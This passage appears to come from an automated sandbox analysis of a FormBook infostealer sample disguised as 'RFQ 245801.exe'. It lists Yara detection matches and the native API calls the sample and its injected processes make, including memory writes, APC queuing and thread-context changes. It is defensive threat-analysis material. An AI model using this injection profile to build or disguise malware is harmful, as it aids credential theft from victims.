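Anything that ends up in the "unclassified" bucket is what you read by hand; on the rows above it is empty, which is the check that the allow-list did not swallow a C2 entry by accident. Decoy domains are part of how FormBook operates, so treat the five domains as a campaign set to block and hunt for rather than assuming each one was contacted.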

          E-Banking Fraud

          Source: Yara match | File source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.RFQ 245801.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.RFQ 245801.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 5.2.RFQ 245801.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.RFQ 245801.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: RFQ 245801.exe PID: 6716, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: RFQ 245801.exe PID: 4280, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: NETSTAT.EXE PID: 7156, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: initial sample | Static PE information: Filename: RFQ 245801.exe
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_0041A330 NtCreateFile,5_2_0041A330
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_0041A3E0 NtReadFile,5_2_0041A3E0
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_0041A460 NtClose,5_2_0041A460
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_0041A510 NtAllocateVirtualMemory,5_2_0041A510
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_0041A2EA NtCreateFile,5_2_0041A2EA
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_0041A32A NtCreateFile,5_2_0041A32A
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_0041A3DA NtReadFile,5_2_0041A3DA
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_0041A45E NtClose,5_2_0041A45E
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_0041A50A NtAllocateVirtualMemory,5_2_0041A50A
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01762B60 NtClose,LdrInitializeThunk,5_2_01762B60
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01762BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_01762BF0
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01762AD0 NtReadFile,LdrInitializeThunk,5_2_01762AD0
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01762D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_01762D30
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01762D10 NtMapViewOfSection,LdrInitializeThunk,5_2_01762D10
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01762DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_01762DF0
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01762DD0 NtDelayExecution,LdrInitializeThunk,5_2_01762DD0
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01762C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_01762C70
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01762CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_01762CA0
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01762F30 NtCreateSection,LdrInitializeThunk,5_2_01762F30
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01762FE0 NtCreateFile,LdrInitializeThunk,5_2_01762FE0
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01762FB0 NtResumeThread,LdrInitializeThunk,5_2_01762FB0
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01762F90 NtProtectVirtualMemory,LdrInitializeThunk,5_2_01762F90
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01762EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_01762EA0
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01762E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_01762E80
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01764340 NtSetContextThread,5_2_01764340
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01764650 NtSuspendThread,5_2_01764650
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01762BE0 NtQueryValueKey,5_2_01762BE0
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01762BA0 NtEnumerateValueKey,5_2_01762BA0
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01762B80 NtQueryInformationFile,5_2_01762B80
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01762AF0 NtWriteFile,5_2_01762AF0
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01762AB0 NtWaitForSingleObject,5_2_01762AB0
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01762D00 NtSetInformationFile,5_2_01762D00
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01762DB0 NtEnumerateKey,5_2_01762DB0
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01762C60 NtCreateKey,5_2_01762C60
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01762C00 NtQueryInformationProcess,5_2_01762C00
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01762CF0 NtOpenProcess,5_2_01762CF0
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01762CC0 NtQueryVirtualMemory,5_2_01762CC0
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01762F60 NtCreateProcessEx,5_2_01762F60
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01762FA0 NtQuerySection,5_2_01762FA0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01762E30 NtWriteVirtualMemory,5_2_01762E30
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01762EE0 NtQueueApcThread,5_2_01762EE0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01763010 NtOpenDirectoryObject,5_2_01763010
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01763090 NtSetValueKey,5_2_01763090
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017635C0 NtCreateMutant,5_2_017635C0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017639B0 NtGetContextThread,5_2_017639B0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01763D70 NtOpenThread,5_2_01763D70
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01763D10 NtOpenProcessToken,5_2_01763D10
          Source: C:\Windows\explorer.exeCode function: 6_2_0FBA8232 NtCreateFile,6_2_0FBA8232
          Source: C:\Windows\explorer.exeCode function: 6_2_0FBA9E12 NtProtectVirtualMemory,6_2_0FBA9E12
          Source: C:\Windows\explorer.exeCode function: 6_2_0FBA9E0A NtProtectVirtualMemory,6_2_0FBA9E0A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112B60 NtClose,LdrInitializeThunk,7_2_03112B60
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_03112BF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112BE0 NtQueryValueKey,LdrInitializeThunk,7_2_03112BE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112AD0 NtReadFile,LdrInitializeThunk,7_2_03112AD0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112F30 NtCreateSection,LdrInitializeThunk,7_2_03112F30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112FE0 NtCreateFile,LdrInitializeThunk,7_2_03112FE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_03112EA0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112D10 NtMapViewOfSection,LdrInitializeThunk,7_2_03112D10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112DD0 NtDelayExecution,LdrInitializeThunk,7_2_03112DD0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_03112DF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_03112C70
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112C60 NtCreateKey,LdrInitializeThunk,7_2_03112C60
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_03112CA0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_031135C0 NtCreateMutant,LdrInitializeThunk,7_2_031135C0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03114340 NtSetContextThread,7_2_03114340
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03114650 NtSuspendThread,7_2_03114650
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112B80 NtQueryInformationFile,7_2_03112B80
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112BA0 NtEnumerateValueKey,7_2_03112BA0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112AB0 NtWaitForSingleObject,7_2_03112AB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112AF0 NtWriteFile,7_2_03112AF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112F60 NtCreateProcessEx,7_2_03112F60
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112F90 NtProtectVirtualMemory,7_2_03112F90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112FB0 NtResumeThread,7_2_03112FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112FA0 NtQuerySection,7_2_03112FA0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112E30 NtWriteVirtualMemory,7_2_03112E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112E80 NtReadVirtualMemory,7_2_03112E80
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112EE0 NtQueueApcThread,7_2_03112EE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112D00 NtSetInformationFile,7_2_03112D00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112D30 NtUnmapViewOfSection,7_2_03112D30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112DB0 NtEnumerateKey,7_2_03112DB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112C00 NtQueryInformationProcess,7_2_03112C00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112CC0 NtQueryVirtualMemory,7_2_03112CC0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03112CF0 NtOpenProcess,7_2_03112CF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03113010 NtOpenDirectoryObject,7_2_03113010
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03113090 NtSetValueKey,7_2_03113090
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_031139B0 NtGetContextThread,7_2_031139B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03113D10 NtOpenProcessToken,7_2_03113D10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_03113D70 NtOpenThread,7_2_03113D70
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_026BA330 NtCreateFile,7_2_026BA330
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_026BA3E0 NtReadFile,7_2_026BA3E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_026BA460 NtClose,7_2_026BA460
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_026BA510 NtAllocateVirtualMemory,7_2_026BA510
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_026BA2EA NtCreateFile,7_2_026BA2EA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_026BA32A NtCreateFile,7_2_026BA32A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_026BA3DA NtReadFile,7_2_026BA3DA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_026BA45E NtClose,7_2_026BA45E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_026BA50A NtAllocateVirtualMemory,7_2_026BA50A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_02EE9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,7_2_02EE9BAF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_02EEA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,7_2_02EEA036
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_02EE9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_02EE9BB2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_02EEA042 NtQueryInformationProcess,7_2_02EEA042
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 0_2_029EE828
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 0_2_0733AAF8
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 0_2_07332620
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 0_2_07332A58
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 0_2_07332A48
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 0_2_07334100
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 0_2_073321E8
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 0_2_073349D8
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 0_2_073349C7
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 0_2_07330006
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_00401030
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_0041D89D
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_0041DA88
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_0041DBA8
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_00402D87
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_00402D90
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_00409E5B
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_00409E60
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_0041DFD5
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_0041E792
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_00402FB0
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017B8158
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017CA118
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01720100
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017E81CC
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017F01AA
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017E41A2
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017C2000
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017EA352
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_0173E3F0
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017F03E6
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017D0274
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017B02C0
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01730535
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017F0591
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017E2446
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017D4420
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017DE4F6
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01730770
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01754750
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_0172C7C0
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_0174C6E0
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01746962
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017329A0
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017FA9A6
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_0173A840
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01732840
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_0175E8F0
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017168B8
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017EAB40
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017E6BD7
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_0172EA80
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017CCD1F
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_0173AD00
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_0172ADE0
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01748DBF
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01730C00
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01720CF2
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017D0CB5
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017A4F40
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01750F30
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017D2F30
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01772F28
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01722FC8
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017AEFA0
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01730E59
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017EEE26
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017EEEDB
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01742E90
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017ECE93
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_0171F172
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017FB16B
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_0176516C
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_0173B1B0
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017E70E9
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017EF0E0
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017DF0CC
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017370C0
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_0171D34C
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017E132D
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_0177739A
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_0174D2F0
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017D12ED
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_0174B2C0
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017352A0
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017E7571
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017F95C3
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017CD5B0
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01721460
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017EF43F
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017EF7B0
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01775630
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017E16CC
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01739950
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_0174B950
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017C5910
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_0179D800
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017338E0
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017EFB76
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017A5BF0
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_0176DBF9
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_0174FB80
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017A3A6C
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017EFA49
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017E7A46
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017DDAC6
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017CDAAC
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01775AA0
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017D1AA3
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017E7D73
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017E1D5A
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01733D40
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_0174FDC0
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017A9C32
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017EFCF2
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017EFF09
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_016F3FD5
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_016F3FD2
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_017EFFB1
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01731F92
          Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 5_2_01739EB0
          Source: C:\Windows\explorer.exe | Code function: 6_2_0F6F1B32
          Source: C:\Windows\explorer.exe | Code function: 6_2_0F6F1B30
          Source: C:\Windows\explorer.exe | Code function: 6_2_0F6F7232
          Source: C:\Windows\explorer.exe | Code function: 6_2_0F6EED02
          Source: C:\Windows\explorer.exe | Code function: 6_2_0F6F4912
          Source: C:\Windows\explorer.exe | Code function: 6_2_0F6FA5CD
          Source: C:\Windows\explorer.exe | Code function: 6_2_0F6F6036
          Source: C:\Windows\explorer.exe | Code function: 6_2_0F6ED082
          Source: C:\Windows\explorer.exe | Code function: 6_2_0FBA8232
          Source: C:\Windows\explorer.exe | Code function: 6_2_0FBAB5CD
          Source: C:\Windows\explorer.exe | Code function: 6_2_0FBA2B32
          Source: C:\Windows\explorer.exe | Code function: 6_2_0FBA2B30
          Source: C:\Windows\explorer.exe | Code function: 6_2_0FBA5912
          Source: C:\Windows\explorer.exe | Code function: 6_2_0FB9FD02
          Source: C:\Windows\explorer.exe | Code function: 6_2_0FB9E082
